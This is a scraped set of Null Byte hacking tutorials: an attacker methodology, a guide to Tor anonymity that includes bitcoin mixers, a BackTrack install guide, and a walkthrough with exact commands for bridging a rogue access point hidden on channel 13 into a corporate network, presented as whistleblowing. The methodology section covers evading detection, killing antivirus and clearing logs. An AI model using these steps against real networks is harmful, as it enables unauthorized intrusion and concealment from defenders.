the near future?Look for more onFacebook hackingand developing the skills and arts of a professional hacker here in the near future, my novice hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Get Your Hacked Facebook Account Back.News:New iWork Update Lets You Unlock Password-Protected Documents with Touch IDHow To:4 Ways to Crack a Facebook Password & How to Protect Yourself from ThemHack Like a Pro:How to Get Facebook Credentials Without Hacking FacebookHow To:Disable iOS 12's Annoying Password Creation Feature on Your iPhoneHow To:Easily See Passwords for Wi-Fi Networks You've Connected Your Android Device ToHack Like a Pro:How to Hack Facebook (Same-Origin Policy)How To:Dashlane & LastPass Can Now Automatically Strengthen All of Your Weak PasswordsNews:You Can Now Save Your Live Instagram VideosHow To:Disable Password Prompts When Downloading Free Apps in the Mac App StoreHow To:Make Siri Show Your Account Passwords to You Quickly in iOS 12How To:Chat with Friends on Messenger Without a Facebook AccountThe Clone Wars:The Russians Flirt with Instagram & Fake Follower Vending MachinesHow To:Protect Yourself from the Biggest Jailbreak Hack in HistoryHow To:Delete Your Facebook Account & Scrub Your DataInstagram 101:How to Break 1,000 Instagram Followers by Linking Your Other Social Media AccountsHow To:Freeze a Facebook account with Facebook FreezerHow To:Facebook Generated Temporary Password to Login App or Website Through FacebookHow To:Secure Your Instagram Account by Adding 2-Factor Authentication & Managing Privacy SettingsHow To:Hack Any Account That Has Recovery via Phone Option Enabled (SMS) On Android:How To:Hide All of the Social Numbers on Your Facebook Page with the DemetricatorHow To:Facebook Freezer with crack!!News:iOS 10 Will Be Released on September 13, but the Gold Master Is Available NowHow To:Set Your Android to Atomic Time for a Perfectly Synced ClockHow To:Create, AutoFill & Store Strong Passwords Automatically for Websites & Apps in iOS 12How To:The Official Google+ Insider's Guide IndexHow To:Really Connect Your Words with Friends Mobile Account to FacebookSocial Engineering, Part 2:Hacking a Friend's Facebook PasswordNews:Should district be allowed to demand middle-schooler's Facebook password?News:Student Sentenced to 8mo. in Jail for Hacking FacebookNews:Bricked iPad Pros, Error 56, & How to FixNews:Facebook Messenger Brings 1,500 Diverse Emoji to Its App
Hack Like a Pro: The Hacker Methodology Β« Null Byte :: WonderHowTo
Welcome back, my neophyte hackers!Many newbie hackers seem to be confused regarding the process or methodology to employ a successful hack. Most want to simply go straight to the exploit without doing the due diligence to make certain that the hack will work and you won't get caught.Here, I want to lay out for you the proper methodology, with example tools and techniques for a hack, from start to finish.Step 1: Performing ReconnaissanceGoodreconnaissanceis critical to great hacking. In general, a good hacker will recon for about 2 to 3 times longer than he/she would performing the actual hack. It's not unusual to spend weeks or months gathering information before even beginning to attempt an exploit.Most exploits are dependent on operating systems, applications, ports, and services, so you need to gather this information before you start hacking. If you don't, you will likely fail, get caught, or both. I can't emphasize this enough. Newbie hackers are always so anxious to get to the exploit that they often ignore this phase of the attack.Recon can be broken into at least two categories, passive and active.Passive ReconnaissancePassive reconnaissance can be defined as gathering information about the target without actually "touching" the target, or in a way that looks like normal traffic.I have already shown youhow to use Netcraftto gather info about websites, such as the web server, operating system, last reboot, and other technologies. All of this information is critical before starting the hack. Most recently, I gave a lesson onhow to use FOCAto gather metadata from documents on a website.In addition, passive reconnaissance can include DNS and SNMP mining, dumpster diving,social engineering, using social media such as Facebook and LinkedIn, and of course, Google hacking, among other techniques.Active ReconnaissanceActive reconnaissance is information gathered about the target by actually sending packets to the target and evaluating the response. The results of active recon are much more specific and reliable, but also much riskier. Anytime we send a packet to a site, our IP address is left behind.Nmap,Hping,Netdiscover,P0f, andXprobe2are among the many tools we can use to gather info on remote targets that can be useful in revealing open ports, running services, and operating systems.Active recon can also include enumeration of the network. Techniques such asbanner grabbingand the use of vulnerability assessment tools such as Nessus,Nikto, and Retina are also often a part of this phase.Step 2: Gaining Access (Exploitation)Exploitation can take many, many forms, and the successful hacker will use their imagination to come up with multiple attack vectors.Metasploitis an excellent tool for exploitation, but don't fall in love with it. As soon as Metasploit develops new exploits, theAV softwaremanufacturers immediately begin developing a new signature for it.Once you have done thorough recon and know all the ports, services and apps, try looking into the vulnerability databases such asSecurityFocus,TechNet, and others for known vulnerabilities and exploits.Be creative and think about all of the protocols that the system or network uses and how they might be abused. Always consider the possibility of aman-in-the middle attackand never overlook the good ol'social engineering attack.Obviously, your attack methodology will differ based upon whether you have remote access or local access. If you can physically enter the network, your options are almost unlimited. Remote access has more limited possibilities for attack vectors, but can be much more malicious.Step 3: Privilege EscalationVery often, we can get access to the system or network, but only with the privileges of an ordinary user. This happens often when we use a client-side attack, where we are attacking an ordinary user's vulnerable applications, such as theweb browser,Adobe Flash,Adobe Reader, etc.Ultimately, we want root or sysadmin privileges that will give us unfettered access to the entire network. This is where we need to escalate privileges. Furthermore, if we have a legitimate account on a website or LAN, we may be able to escalate its privileges to gain root or sysadmin.In some cases, if we have been able to compromise one system with user privileges on the network, we canpivot from that single systemto compromise another system with system privileges.If you can get theMetasploit Meterpreteron the system, the meterpreter has a command "getsystem" that iterates through 15 known privilege escalation methods to gain system admin privileges.Once again, do not downplay or ignore the possibility of usingsocial engineering techniquesto gain system admin privileges by, in many cases,asking for the passwordunder the proper context.Step 4: Leaving Behind a Backdoor or ListenerOnce we have successfully exploited the system and then escalated our privileges to sysadmin or root, it will be necessary to leave behind alistener or rootkit. This listener, ideally, will persist beyond when the system is rebooted and will be there when we want to come back to the system and continue to use/exploit/extract.This listener can take many forms, such asNetcat, a command shell, VNC,Meterpreter, etc.Step 5: Extracting DataUltimately, the primary reason for exploiting/hacking a machine is to gain access and extract or exfiltrate data. This can be credit card data, personally identifiable information (PII), intellectual property, or other valuable information.To do so, we need a way to remove the data in a way that is not readily noticeable by the sysadmin, and ideally, encrypted.RecubandCryptcatare two tools that can remove data stealthily.Metasploit's Meterpreter also has anupload and downloadcommand for uploading malicious software and downloading critical and valuable data.Step 6: Covering Your TracksTo make certain that our exploits don't lead back to us, we need to cover our tracks. This can take many forms such clearing log files, removing any software we uploaded, removing our command history, etc. Metasploit's Meterpreter has akillavscript to disable antivirus software, as well as aclearevcommand that removes the event logs on Windows systems.I hope that this simple outline of the hacker methodology helps many of my neophyte hackers to better understand the hacker process.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)How To:This $1,300 Ethical Hacking Bundle Is on Sale for $40 TodayNews:Some of the World's Most Notorious Hackers Got HackedThe Sony Hack:Thoughts & Observations from a Real HackerHow To:This 5-Course Data Analytics Bundle Is Just $49 TodayHow To:The Essential Skills to Becoming a Master HackerWhite Hat Hacking:Hack the Pentagon?News:Funniest Hacks in HistoryHow to Hack Like a Pro:Getting Started with MetasploitHow To:The Five Phases of HackingNews:White House Hacked by Russian Hackers!News:Airline Offers Frequent Flyer Miles to HackersHow To:Utilize Scrum in Axosoft OnTime 2008How To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Hack Like a Pro:How to Save the World from Nuclear AnnihilationNews:Student Sentenced to 8mo. in Jail for Hacking FacebookNews:Anonymous Hackers Replace Police Supplier Website With β€˜Tribute to Jeremy HammNews:Indie and Mainstream Online Games Shut Down by LulzSecGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsHow To:The Official Google+ Insider's Guide IndexHow To:Conceal a USB Flash Drive in Everyday ItemsHow To:How Hackers Take Your Encrypted Passwords & Crack ThemHack Like a Pro:Creating Your Own Prism Program
How to Access the Dark Web While Staying Anonymous with Tor Β« Null Byte :: WonderHowTo
The dark web is an intimidating place for a newbie hacker, but it's a powerful tool once you've learned to navigate it safely. To help you out with that, this guide will cover some need-to-know information for traversing the dark corners of the internet while keeping your identity and data safe. (Hint: UsingToris not enough.)The Wonders of the Dark WebFirst off, we should establish that the term "dark web" refers to overlay networks running on top of the normal internet infrastructure, which need special permission or custom software to access. Three of the most popular dark web networks are I2P, Freenet, and Tor. For the purposes of this tutorial, we will talk about the most popular and widely known network, Tor.Tor's intended purpose is to protect user's privacy through anonymity. It often gets a bad reputation for being used for criminal activity, such as buying and selling narcotics from sites likethe infamous Silk Roadorthe recently shut-down AlphaBay.Don't Miss:How to Keep Your Internet Traffic Private from AnyoneIn spite of this, Tor has a much more noble history, often used by whistleblowers to expose government corruption or by regular people to circumvent oppressive government censorshipin places like Ugandaor, rather famously, China. The United States Justice Department recentlyeven endorsed Torfor use by federal judges to keep their personal data private while working on controversial cases.Tor, known as "The Onion Router" due to its layered nature, is a network that runs on top of the regular internet and directs your web traffic through a series of relays before sending it to its final destination. If I were a journalist trying to expose government corruption in Uganda worried about censorship or surveillance, I would need to connect to services without my internet service provider knowing what I was really doing. If I wanted to reach a mail server through Tor, my request would travel encrypted along with a random path through the Tor network, rather than directly through my ISP.A description of how the Tor network functions.Image viaElectronic Frontier FoundationEach step along the way is encrypted, and my traffic might go to Tor nodes in France, and then Denmark, before finally reaching a final exit destination in the United States. While in transit, the Tor node can only see the IP address of the next location. By the time my request to access the mail server has reached the exit node in the United States, my original IP address is completely unknown, and in Uganda, my ISP would only see the encrypted traffic.Tor showing me what my IP address appears to be to the rest of the Internet. In this case, it’s in France.Installing & Using TorThere are several ways of accessing the Tor network, but for this tutorial, we are going to use the Tor Browser. The Tor Browser bundle is a good way for beginners to use Tor since it comes preconfigured in a way that is designed to maximize your privacy and security.Step 1: Download the Tor BrowserDownloading the Tor Browser is as simple as going to theTor Project websiteand selecting the appropriate file to download. Select your operating system, your language, and either the 32-bit or 64-bit version. If you're unsure, choose the 32-bit version.Step 2: Install the Tor BrowserThe installation process for the Tor Browser is pretty basic but will vary slightly depending on your operating system. We've broken it down as follows. If you get stuck, additional instructions can also be found at the Tor Project website link above.WindowsTo install Tor on Windows, double-click on the Tor Browser install executable file. When prompted, enter your desired language and click "OK," then click "Install."LinuxInstalling Tor on a Linux distribution can be done through the terminal. First, move to the directory where you downloaded the file by typing:cd _folder/subfolder/etcThen unpack the .tar.xz file by typing:tar -xvJf tor-browser-linux32-7.0.4_en-US.tar.xzIn this command, the 32 will be replaced with 64 if you use the 64-bit version, the 7.0.4 refers to version, and en-US is for the English version.Next, move to the directory you just created:cd tor-browser_en-USAnd then you can run the Tor Browser by typing the following (do not do this under the root user):./start-tor-browser.desktopAlternatively, you can also click on the Tor Browser Setup icon in the file.macOS (Mac OS X)After downloading the file, click on it to open the .dmg file. Drag the Tor Browser app inside your applications folder, and open it.After Tor builds a relay, a browser window will open. You're now connected to Tor, but make sure to update the browser if needed.Tor building a circuit.The landing page will let you know if you need to update it before using the Tor Browser.Make sure to update!Step 3: Get Around on the Tor NetworkAccessing sites on the Tor network is not always straightforward. To navigate to regular internet websites, you can simply type a URL likewikipedia.comin the address bar. Sites that are hosted on the Tor network have an .onion domain, preceded by arbitrary characters. For example,zqktlwi4fecvo6ri.onionis the current location of theHidden Wiki.The Hidden Wiki is a good place to start when you're first familiarizing yourself with what Tor has to offer. It breaks down some of the most popular destinations on the network into categories and also has some interesting articles, like how to verify PGP signatures.In order to find sites on the Tor network, Google isn't going to be very helpful. There are several dark web search engines, the most popular one being Torch, but these are not going to get you everywhere you might want to go. Keep in mind that most of the Tor network is not indexed, and as such, you will need to know the exact URL of the website you wish to connect to in order to access it. Reddit or other communities can sometimes be helpful for this purpose.Torch, a Tor network search engine.Step 4: Stay Anonymous on TorNow that you know the basics of browsing the Tor network, it's time for more important tasks β€” keeping yourself anonymous. Tor alone is not enough to mask your identity.Protect Your IdentityIn order to protect your privacy and stay anonymous when interacting on the dark web, you must assume a new identity. Never associate this new identity with details about the real you. This goes beyond making sure to never reuse old usernames β€” your anonymous identity should appear to be a completely different person than the real you. Leave all your real-world preferences, characteristics, and information behind if you want to stay anonymous.Disable ScriptsThe wonders of Flash and JavaScript make the internet very convenient nowadays. JavaScript is the reason Google can suggest search results in real time while you're typing because it's able to see your keystrokes, one by one. This is just one of the various ways that scripts can collect more information from users that could potentially compromise your security. In addition, scripts can be used in delivering malware, which can then expose your privacy and reveal details like your real IP address.For these reasons, you'll want to disable scripts in the Tor Browser to prevent websites from obtaining identity compromising information. Do this by selecting the "S" icon in the top-left corner of the Tor Browser window.Disabling scripts on the Tor browser.Use Encryption When CommunicatingTo stay anonymous when you're communicating on the Tor network, it's a good idea to use encryption. Many of you may be familiar with PGP encryption, or have at least seen something that looks like this:This is a PGP public key, something you're going to see often on yourdeep webexploits. You're going to need this in order to encrypt messages intended for the owner of that key. To make life more convenient, there are several tools available that allow you to quickly encrypt and decrypt messages in PGP such asKleopatra. For more information on PGP encryption, check out one of our tutorials about it:More Info:How to Use GPG4Win in Windows to Encrypt Files & EmailsWhether you use PGP or a more advanced encryption method, having your communication encrypted is essential to maintaining anonymity, especially if you're using it to communicate private information like an address, for example.Don't Download AnythingDownloading files from the Tor network is a big no-no. First, it wastes network resources which are unequipped to deal with that kind of traffic. Secondly, files you download to your computer could easily contain malware which sends back your real IP address or exposes your identity in other ways. If you must download something off the Tor network, make sure it is from a source you trust.Step 5: Things to Be Mindful OfWhile we've already discussed anonymity above, there are a few more things you need to consider when browsing the Tor network with the Tor Browser.Tor Exit NodesOne of the major risks of Tor is using exit nodes. When your traffic is routed through the Tor network, the last jump from a Tor node to your destination is not encrypted. Because Tor exit nodes are notoriously used for criminal behavior, some services will detect and blacklist activity originating from a Tor exit node. If you connect to most IRC chat rooms through Tor, for instance, IRC will only see that the IP address connecting to it is an address on a Tor network exit node, and you will be K-lined (IP banned).In general, be mindful of the fact that just because you are using Tor to stay anonymous, any place you go to can still see that you are using Tor.Beware of BitcoinsBitcoin is often purported as an anonymous currency, but this somewhat misleading. While there is no hard link between your real identity and your bitcoin activity, there are two crucial things to keep in mind.The first is that your bitcoin address and all of its history will be available to anyone because of the nature of the blockchain β€” a database that records every bitcoin transaction in history. The second issue is that any reputable bitcoin wallet service will require an authentication of your identity in order to exchange bitcoins for real world currency. While this information is kept only in the hands of the exchange service, it does pose a threat as a tangible link between your real-world identity and your deep web presence.Bitcoin is often associated with the Tor network.Image by BTC Keychain/FlickrDon't Miss:The Best Bitcoin Wallet Apps for Your Android DeviceIf you want to take an extra step to make sure your bitcoins can't be traced back to your unique wallet address, you can use a bitcoin mixer, sometimes also called a bitcoin tumbler. Some examples includeShadow WalletandEasyCoin. Mixer services act as a middle man between your bitcoin address and the address you're sending them to. Everyone that is using that services has all their bitcoins put a giant pool and mixed around before they are sent. This way, the bitcoins that reach the recipient are from a variety of different address unassociated with yours.Timing AttacksTiming and correlation attacks can be used to pinpoint someone's IP address by comparing the timing of outgoing traffic to traffic that appears on the other end of the Tor network. While this requires a lot of patience and resources, It can ultimately be used to reveal your identity. This tactic is generally reserved for government agencies like the FBI and NSA to catch high profile targets like terrorists or large-scale narcotics distributors. You can read more about timing attacks onDeepDotWeb.Tor Is Always RiskyThis tutorial is a good starting point to help you protect your privacy on the dark web. It is by no means a comprehensive list of everything that could be done to preserve your anonymity. No matter how hard you try to conceal your real identity when using Tor, there is always a risk, however small, that you will be discovered. Keep this in your mind when making decisions about what you do on the dark web.Hopefully, you've gained some basic knowledge you can use to arm yourself for your new dark web exploits. Good luck, be careful, and don't be a terrorist!Don't Miss:How to Host Your Own Tor Hidden Service with a Custom Onion AddressFollow Null Byte onTwitterandGoogle+Follow WonderHowTo onFacebook,Twitter,Pinterest, andGoogle+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Black Slash/Null ByteRelatedHow To:Become Anonymous & Browse the Internet SafelyTor for Android:How to Stay Anonymous on Your PhoneHow To:Stay as Anonymous as Possible OnlineDark Side of the Prism:Get Alerted Whenever You Visit a Website Owned by a PRISM-Targeted CompanyHow To:Use Private Encrypted Messaging Over TorHow To:The Top 80+ Websites Available in the Tor NetworkHow To:With the Silk Road Bust, the Online Black Market Already Has a New HomeNews:Reality of VPNs, Proxies, and TorHow To:Access Deep WebHow To:Check if Your Significant Other Used Ashley Madison to Cheat on YouHow To:Is Tor Broken? How the NSA Is Working to De-Anonymize You When Browsing the Deep WebHow To:Stay Anonymous on Your Nexus 7How to Become Anonymous Part 2:Tails: The OS Made for AnonymityNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Three: Hidden ServicesHow To:Become Anonymous on the Internet Using TorAnonymous Browsing in a Click:Add a Tor Toggle Button to ChromeEditor Picks:The Top 10 Secret Resources Hiding in the Tor NetworkNews:Anonymity Networks. Don't use one, use all of them!News:Anonymity, Darknets and Staying Out of Federal Custody, Part Two: Onions and DaggersTor vs. I2P:The Great Onion DebateNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Four: The Invisible InternetNews:Anonymity, Darknets and Staying Out of Federal Custody, Part One: Deep WebHow To:Use Tortunnel to Quickly Encrypt Internet Traffic
How to Hack Wi-Fi: Creating an Invisible Rogue Access Point to Siphon Off Data Undetected Β« Null Byte :: WonderHowTo
Welcome back, my greenhorn hackers!Continuing withmy Wi-Fi hacking series, this article will focus on creating an invisible rogue access point, which is an access point that's not authorized by the information technology staff and may be a significant security vulnerability for any particular firm.Remember, as I've said before, hacking wireless networks isn't all justcracking Wi-Fi passwords!Let's Run a Scenario for ContextIn our scenario, we work for a large oil drilling and exploration firm. Our firm has been fracking rock and sandstone beneath the surface of the earth, a technique that injects sand, water, and chemicals underground to release oil and gas.Image via1bog.orgResidents Are Getting Sick Around the Fracking AreaLately, a number of residents in the area have fallen sick and one has died. Residents suspect that the chemicals our employer is using in their frack solution has poisoned their ground water, resulting in the illness and death.Our employer vehemently denies any role in the residents' illness and death, and claims that the chemicals that they inject into the ground are all safe. Furthermore, they claim that none of the fracking solution has leaked into the area's groundwater.Image viaappvoices.orgAlthough you're not a member of the engineering group, you have heard rumors that your employer is using toluene, a highly toxic substance, in its fracking solution. If this is true and it was released into the surrounding ground water, it probably accounts for the illnesses and death and will likely cause more deaths if it gets into the groundwater again.Help Uncover the Truth with a Rogue APYou are determined that this should not happen again and you decide that in your off-hours, you'll work with environmental groups and hackers to try to disclose whether your employer is actually using toluene in its fracking solution.They need access to the records of the engineering group's records to prove that the company is lying and keep them from further poisoning the surrounding ground water.Knowing that you work for the oil company, they ask you to put up a rogue access point that will bypass the firm's firewall and IDS (intrusion detection system), be invisible to the information security team, and yet provide them with nearly unlimited access to the firm's network and records.How a Rogue AP Works UndetectedIn the United States, the FCCregulates the wireless industryand technologies, and has decided that only channels 1-11 are to be used. Many other nations use 1-12 or 1-14.An access point communicating on channels 12, 13, or 14 would be totally invisible to wireless adapters built to only pick up only channels 1-11 in the states. If we can get our rogue AP to communicate on channel 13, for instance, it would invisible to the information security team at the oil drilling company or any one else. Of course, we would need to set our wireless adapters to communicate on channel 13 to be able to connect to it.Step 1: Change the Wireless Adapter's Regulatory DomainSince Japan allows channels 1-14, if we set our access point to use the Japanese regulatory domain, we will be able to communicate on channels 12, 13, and 14 in addition to the 1-11 allowed in the U.S.We can do this by:iw reg set JPiwconfig wlan0 channel 13iwconfigStep 2: Put the Wireless Adapter into Monitor ModeNext, we need to put the wireless adapter into monitor mode.airmon-ng start wlan0Step 3: Create Our Access PointTheaircrack-ng suite of hacking toolscontains a tool calledairbase-ngfor creating an AP from your wireless adapter. We can use it by typing:airbase-ng -c 13 mon0-c 13designates that it will communicate on channel 13mon0designates the wireless adapter to use to create the APStep 4: Bridge Our AP to the Wired NetworkNow that we've created an AP, we need to connect it to oil company's internal, wired network. In this way, traffic through the AP will go directly onto the corporate internal network and bypass all its security, including any firewall or intrusion detection system.First, open a new terminal, create a bridge, and name it "Frack-Bridge". We do this by typing:brctl addbr Frack-BridgeStep 5: Add the Interfaces to the BridgeAfter creating the bridge, we need to connect both interfaces, one for the internal wired network,eth0, and the other from the virtual interface from our AP,at0, to our bridge. We can do this by typing:brctl addif Frack-Bridge eth0brctl addif Frack-Bridge at0Step 6: Bring the Interfaces UpWe need to now bring up or activate the interfaces.ifconfig eth0 0.0.0.0 upifconfig at0 0.0.0.0 upStep 7: Enable IP ForwardingLinux has a built-in feature for forwarding traffic or IP forwarding in the kernel. We can do this by:echo 1 > /proc/sys/net/ipv4/ip_forwardStep 8: Navigate the Internal NetworkNow, when your colleagues connect to our invisible AP (they will need to enable channel 13 on their wireless adapter), they will have access to the entire, internal corporate network.In this way, they can get the information they need from the engineering department to prove that the fracking solution did or did not contain toluene, and whether the company is responsible for poisoning the drinking water of the local community.Stay Tuned...Make sure to check back on ourWi-Fi Hackingseries, because even more wireless hacks are coming! If you have any questions, please comment below or start a discussion in theNull Byte forumand we'll try to help you out.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual License'Gasland' stillvia 1BOG,Fracking rig photovia Appalachian Voice, andFrack you photoviaMichael G McKinne/ ShutterstockRelatedHow To:This App Saves Battery Life by Toggling Data Off When You're on Wi-FiHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsHack Like a Pro:How to Get Even with Your Annoying Neighbor by Bumping Them Off Their WiFi Network β€”UndetectedAndroid Basics:How to Connect to a Wi-Fi NetworkHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow To:Your iPhone's Using More Data Than It Needs, but This Could Stop ItHow To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:Turn on Google Pixel's Wi-Fi Assistant to Get Secure Access on Open NetworksHow to Hack with Arduino:Building MacOS Payloads for Inserting a Wi-Fi BackdoorHow to Hack with Arduino:Tracking Which Networks a Mac Has Connected To & WhenHow To:The Beginner's Guide to Defending Against Wi-Fi HackingHow To:Hack WiFi Passwords for Free Wireless Internet on Your PS3How To:Fix the Wi-Fi Roaming Bug on Your Samsung Galaxy S3How To:FaceTime Forcing LTE Instead of Wi-Fi? Here's How to Fix ItHow To:Spy on Network Relationships with Airgraph-NgHow To:What All the Bluetooth & Wi-Fi Symbols Mean in iOS 11's New Control Center (Blue, Gray, or Crossed Out)How To:Save Cellular Data by Using Wi-Fi Only for FaceTime Audio & Video CallsHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyNews:Project Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi ChipsHow To:This Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhoneNews:Save Money with These Awesome Freebies from Your Cellular ProviderHow To:Schedule Bluetooth, Data, Wi-Fi & Other System Settings on AndroidHow To:Save Battery Power by Pairing Wi-Fi Connections with Cell Tower Signals on Your Galaxy Note 3How To:PIN-Protect Mobile Data & Wi-Fi to Prevent Procrastination & Unwanted ChargesHow To:Easily Store Your iPhone's Wi-Fi Passwords & Share Them with Anybody β€” Even Android UsersHow To:Wardrive on an Android Phone to Map Vulnerable NetworksNews:Traveling Abroad? Here Are 6 Reasons Google Fi Is the Best OptionHacking Android:How to Create a Lab for Android Penetration TestingHow To:Track Wi-Fi Devices & Connect to Them Using ProbequestHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:Get the Strongest Wi-Fi Connection on Your Android Every TimeHow to Hack Wi-Fi:Creating an Evil Twin Wireless Access Point to Eavesdrop on DataGoogle Chrome 101:How to Play the Hidden Dinosaur Mini-Game on Your iPhone or Android PhoneHow To:Hunt Down Wi-Fi Devices with a Directional AntennaHow To:PAIRS Is the Easy Way to Restore Wi-Fi & Bluetooth Connections After Wiping Your PhoneHow To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherHow To:Trick WiFi-Only Apps into Working with Mobile Data on Your HTC OneHow To:Hack Anyone's Facebook, Twitter or YouTube Account with Your Android DeviceHow To:Auto-Toggle Your Android Device's Wi-Fi On and Off When Near or Away from a Hotspot
Hack Like a Pro: How to Install BackTrack 5 (With Metasploit) as a Dual Boot Hacking System Β« Null Byte :: WonderHowTo
Welcome back, my hacker novitiates!Many of you have written me that you're having difficulty installing and runningMetasploiton a variety of platforms. No matter if you're using Mac, Linux, or Windows, I strongly recommend you installBackTrackas your secondary OS, a virtaulization system, or on an external drive. This particular Linux distribution has many hacking and security tools integratedβ€”including Metasploit.NOTE: BackTrack Is No Longer Supported; Switch to Kali LinuxBackTrack is no longer supported by the developers, so we have stopped using it as our primary hacking system here onNull Byte. Instead, please check outmy guide on installing Kali Linux, which is what we now use for most hacks in Null Byte. Of course, you can still read on below if you'd like to get a little information about what BackTrack was and how it worked.This article serves as an introduction to BackTrack, including where to get it, how to install it, and how to navigate and use it. If you want to followmy hacks, you need BackTrackβ€”period.Let's start at the very beginning. No, not the Big Bang, but the beginning of hacking and using BackTrack.The Beginning of BackTrackHacking is a relatively new discipline. The Internet became commercialized in the mid-'90s, but it wasn't until the late-'90s that e-commerce sites were widely used. So, we can date hacking's birth to less than 15 years ago. Yes, hacking was happening at thevery start of the Internet, but it didn't thrive until there was big money involved.Back then, hackers developed their own tools and exploits. In the early part of the new millennium, hackers began to release their tools over the Web and share them with others. Several groups began to collect these tools and either make them available for download from one centralized repository, or began packaging them into a Linux-based CD or DVD.Two of those groups, WHAX and The Auditor Security Group, merged and formed Offensive Security, which released BackTrack 1.0 in February 2006.How to Download & Install BackTrackOkay, enough history. Let's go head and download it.Step 1: Download BackTrackYou can download the latest version of BackTrack in its website'sdownloads section. You do not need to actually registerβ€”just hit the "Download" button.When you get to the download screen, this is what you should see:Choose what version you want. I suggest the latest version (5 R3).Choose what Linux interface you want, GNOME or KDE. This really is a matter of preference, but I'll be running KDE.Choose what architecture you're running (32- or 64-bit).Choose what image type you want. If you're running VMWare, you should use that one. Otherwise, download the ISO.Choose how you want to download it, either directly (like FTP) or through a torrent (peer-to-peer file sharing).I will assume you filled in all of those fields and you're now downloading. Be patient, it could take awhile.Step 2: Burn a DVDFrom here on out, I will assume that you've downloaded an .ISO image.Place a blank DVD in your DVD burner, go to your downloads directory, right-click the BackTrack .ISO file, and select burn a disk with either Windows Burner or any other proprietary burning software.If you're using Windows Disc Image Burner like me, just hit "Burn".Step 3: Install BackTrackOnce we have a successfully burned DVD, we can install BackTrack, but there are a few options:Install it on a virtual machine in a virtaulization system likeVMWare Workstation,VirtualBox, orVirtual PC. VMware is my favorite, but it's not free. VirtualBox comes in close secondβ€”and it is free.Install it as a dual boot system (this is what I chose).Install it as a portable OS onto an external hard drive, USB flash drive, or bootable DVD.Place the DVD of BackTrack into your DVD tray and reboot your system. This will run BackTrack as a liveCD, which means that you can use it, but nothing is written to your hard disk. Everything runs in RAM. When you turn off your machine, everything is gone and no changes will have been made to your hard drive and system.This might be a good way to test out BackTrack, but if you really want to become proficient with itβ€”install it on your hard drive.Installing straight to your hard drive lets you to create a dual-boot system. That means you can choose to boot into your regular OS system (in my case, Windows) or BackTrack. For your day-to-day work, you can boot into Windows, and then at night when you want to hack, you can boot into BackTrack.When you're ready to install it onto your system, simply click on the BackTrack icon in the upper left-hand corner to install it on your hard drive. Then follow the wizard screens asking you for information about your system, etc.You should then have a screen that looks like this!Congratulations on your successful BackTrack install.In my next article, I will take you on a brief tour of BackTrack, showing you the essentials of how to get around and find the hacking tools you need to Hack Like a Pro!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Get Started with Kali Linux (2014 Version)How to Hack Like a Pro:Getting Started with MetasploitHack Like a Pro:Getting Started with BackTrack, Your New Hacking SystemHack Like a Pro:How to Exploit and Gain Remote Access to PCs Running Windows XPHow To:PlayStation Gaming, Dual-Booting, and 6 Other Cool Ways to Get More Out of Your Nook eReaderHow To:Remove BackTrack & Install Kali as a Dual-Boot System Without Damaging Your Hard DriveHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 21 (GRUB Bootloader)Hack Like a Pro:How to Remotely Install a Keylogger onto Your Girlfriend's ComputerMac for Hackers:How to Install the Metasploit FrameworkHack Like a Pro:Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)Hack Like a Pro:Metasploit for the Aspiring Hacker, Part 4 (Armitage)Hack Like a 